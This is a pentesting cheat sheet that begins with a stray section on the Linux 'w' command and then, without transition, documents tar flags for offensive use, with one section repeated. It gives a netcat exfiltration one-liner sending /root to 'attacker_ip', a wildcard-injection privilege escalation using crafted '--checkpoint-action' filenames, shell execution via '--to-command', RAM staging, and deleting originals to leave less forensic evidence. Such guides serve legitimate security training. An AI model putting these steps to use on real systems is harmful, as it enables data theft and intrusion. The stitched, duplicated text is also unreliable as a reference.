w

The w command shows:

Who is currently logged in From where What they are doing How active the system is System uptime + load averages

It pulls information primarily from:

/var/run/utmp process tables (/proc) terminal sessions (pts, tty) system uptime/load info

Think of it as:

“What users are active right now, and what processes are attached to their terminals?”

w command: Useful usage flags with their exlanation and use cases.

This guide will walk you through different options, flags and where you might need them in active engagement.

Basic Commands

• Basic Usage

   w
  

  Example Output

     14:22:11 up 3 days,  5:11,  3 users,  load average: 0.15, 0.09, 0.05
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    root     pts/0    10.10.14.7       13:10    2:11   0.04s  0.01s bash
    john     pts/1    192.168.1.20     13:55    0.00s  0.33s  0.12s vim notes.txt
    mysql    tty1     -                Mon09    1day   0.00s  0.00s -
  

  Handling Corrupt Files

    tar -cvf backup.tar /root --ignore-failed-read
  

  Verify Archive Integrity

    tar -cvf backup.tar /etc -W
  

  • Exfiltrating large datasets

  • Ensuring archive not corrupted

  Deleting Original Files After Archiving

    tar -cvf loot.tar /tmp/loot --remove-files
  

  • Clean artifacts after staging
  • Remove sensitive traces

  Preserves Absolute Path

    tar -P -cf archive.tar /etc/passwd
  

  • Tar removes leading / by default as it;
    • Prevent overwriting arbitrary system files on extraction
    • Avoid archive extraction attacks
    • Safer default behavior

  Pentesting Use Cases:

  • Data exfiltration staging
  • Bundling loot
  • Archiving sensitive directories before transfer

  💡 On compromised systems, tar is almost always installed — reliable for staging data.

---

• Extract an archive

   tar -xvf backup.tar
  

  • x → extract
  • v → verbose
  • f → filename

  What it does?
  Extract archive contents.

  Keep old files

    tar -xvf archive.tar -k
  

  • Avoid damaging system

  Do not overwrite if target is newer

    tar -xvf archive.tar --keep-newer-files
  

  Change Extraction Path

    tar -xvf archive.tar -C /tmp
  

  Unlink(Delete) befor extraction

    tar -xUf archive.tar
  

  • Deletes (unlinks) the existing file first.
  • For each file:
    • If file exists → remove it completely
    • Then create fresh file
  • Normal Tar behavior:
    • Tar opens it
    • Overwrites contents
    • But file metadata may remain

  Pentesting Use Cases:

  • Deploying uploaded tools
  • Unpacking privesc scripts
  • Extracting backups found on system

  💡 Extracting untrusted archives can be dangerous (path traversal risk).

---

• List Archive Content

   tar -tvf backup.tar
  

  • t → view
  • v → verbose
  • f → filename

  What it does?
  View archive contents without extracting.

  Pentesting Use Cases:

  • Before extracting unknown archive:

    tar -tf suspicious.tar
  

  • Prevents accidental file overwrite
  • Detects malicious archive entries like:

    ../../etc/passwd
  

  ---

• –one-top-level

     tar -xvf archive.tar --one-top-level=name(optional)
  

  What it does?
  Creates a new directory and extracts all files inside it. Prevents path traversal attacks.

  Pentesting Use Cases:
  * Safe handling of untrusted archives
  * Secure DevOps extraction

---

• Append Files

    tar -rf backup.tar newfile.txt
  

  What it does?
  Add files to end of archive.

  ⚠️ Cannot be used on compressed archives.

  Pentesting Use Cases:

  • Add new loot incrementally without rebuilding archive.

---

• Update (Append only if newer)

   tar -uvf backup.tar file.txt
  

  What it does?
  Versioned archiving: Adds file only if newer than archived version.
  It DOES NOT replace old copy — it appends a new version.
  Archive may contain multiple versions.

  ⚠️ Cannot be used on compressed archives.

  To extract a specific version file from archive

    tar -xvf backup.tar --occurrence=2 file.txt
  

  Pentesting Use Cases:

  • Incremental backups during long engagement
  • Preserving timeline of file changes ***

• Compare Archive to Filesystem

    tar -dvf archive.tar
  

  What it does?

  • Compare archive with current filesystem.
  • Detect modified files.

  ⚠️ Cannot be used on compressed archives.

  Pentesting Use Cases:

  • Forensic analysis
  • Detect file tampering

  💡 Useful during post-exploitation cleanup. ***

• Delete From Archive

    tar --delete -f archive.tar file.txt
  

  What it does?

  • Remove file from archive.

  ⚠️ Cannot be used on compressed archives.

====================================================================

Intermediate Commands

• Incremental Backup

    tar -g snapshot.file -cvf backup.tar /home
  

  What it does?

  • Tracks filesystem changes using snapshot file.

  ⚠️ Cannot be used on compressed archives.

  Pentesting Use Cases:

  • Stealth data exfiltration
  • Monitoring changed files

  Usage
  snapshot.file stores metadata about:

  • inode numbers

  • timestamps

  • device numbers

  • file state

      tar -g snapshot.file -cvf backup2.tar /home
    

    Now tar compares:

  • Current filesystem

  • Data inside snapshot.file

  And only archives:

  Modified files and Newly created files

  🔥 This makes backup2.tar much smaller.

  Restore
  You must extract in order:

    mkdir restore
    cd restore
  
    tar -xvf backup.tar
    tar -xvf backup2.tar -g /dev/null
  

  Why /dev/null? During creation
  The snapshot file is actively used.
  During extraction The snapshot file is NOT used. But tar’s syntax requires that if archive was created with -g, you must also supply -g when extracting. It’s a syntactic requirement, not a functional one.

  🧩 Why Tar Requires -g at Extraction

  GNU tar stores special incremental metadata inside the archive:

  • Directory state

  • Deletion records

  • Dump level markers

  When extracting incremental archives, tar switches into incremental restore mode only if -g is specified.

  If you don’t use -g, tar may:

  • Ignore deletion markers

  • Not properly restore directory metadata

  • Behave differently with incremental archives

  So -g tells tar:

  “This archive is incremental. Process it accordingly.”

  🧠 Why /dev/null Specifically?

  During extraction:

  • Tar needs a filename after -g
  • But it does NOT actually read the snapshot file
  • It only checks that one is supplied
    So we give it:

    /dev/null
    

    Because:

  • It exists
  • It’s harmless
  • It contains nothing
  • It discards any write attempts

  Want to force a new full backup

    tar -g snapshot.file --level=0 -cvf full.tar /home
  

  • this truncates snapshot file

---

• Sparse Files

       tar -S -cvf db.tar database.img
  

  What it does?

  • Efficiently archives sparse files.
  • Huge files with empty blocks.
  • Example:
    • VM disk images
    • Database files

  Pentesting Use Cases:

  • Archiving VM images found on system
  • Dumping database files efficiently ***

• Sparse Files

       tar -S -cvf db.tar database.img
  

  What it does?

  • Efficiently archives sparse files.
  • Huge files with empty blocks.
  • Example:
    • VM disk images
    • Database files

  Pentesting Use Cases:

  • Archiving VM images found on system
  • Dumping database files efficiently ***

    GTFO, LoL & PrivSec

• –to-command

   tar -xf archive.tar --to-command=/bin/sh
  

  • Tar will:
    • Extract each file
    • Pipe its contents to /bin/sh But /bin/sh expects commands, not file data.

        tar -xf archive.tar --to-command='sh -c "echo pwned"'
      

      or

        tar -xf archive.tar --to-command='cat > /tmp/output'
      

      ---

• Pure in-memory streaming exfiltration

    tar -czf - /root | nc attacker_ip 4444
  

  • c → create archive
  • z → gzip compress
  • f - → write to stdout (NOT a file) | → pipe nc → send data over network

  Tar never writes to disk. It streams directly to netcat.

  Attacker Side

    nc -lvnp 4444 > received.tgz
  

  • l → listen
  • v → verbose
  • n → no DNS
  • p 4444 → port 4444

    received.tar.gz → save incoming data

  Stream and auto-extract on receiver

    nc -lvnp 4444 | tar -xzf -
  

  Replace nc with ssh(more advanced)

    tar -czf - ~/labdata | ssh user@remote 'cat > loot.tar.gz'
  

  Victim Side

    tar -czf - ~/labdata | nc 127.0.0.1 4444
  

  • 127.0.0.1 = local machine
  • No file created on disk
  • Archive streamed through memory ***

• In-memory Staging through /dev/shm

  /dev/shm is:

  • A tmpfs filesystem
  • Backed by RAM
  • Not written to disk
  • Cleared on reboot

      tar -czf /dev/shm/cache.tgz /directory
    

    Staging = preparing data before exfiltration.

  In-memory staging = storing that staged data in RAM instead of disk. ***

• Wildcard Injection Privesc

  You can create malicious filenames(in same dir):

    touch "--checkpoint=1"
    touch "--checkpoint-action=exec=sh shell.sh"
  

  If a cron job runs:

    tar -cf backup.tar *
  

  Shell expands to:

    tar -cf backup.tar file1.txt file2.txt --checkpoint=1 --checkpoint-action=exec=sh shell.sh
  

  as tar interprets these as options:

    --checkpoint=1  #Trigger a checkpoint every 1 record.
    --checkpoint-action=exec=sh shell.sh  #At checkpoint, execute this command.
  

  💡 Use -- to stop option parsing:

    touch -- "--checkpoint=1"
    touch -- "--checkpoint-action=exec=sh shell.sh"
  

• Other Usage

•   find / -name "*.tar*" 2>/dev/null
  

  Search for backup files

• source code
• credentials
• old configs

• tar -g snap -cvf loot.tar /tmp/data --remove-files
  

  • Archive only new data, then remove originals.
  • Less forensic evidence.

• Related Commands & Tools

  • auditd = Linux Auditing System that records security-relevant events, system calls, and user activities to a log file

• Further Check out

  • lolbas_reference
  • gtfobins/tar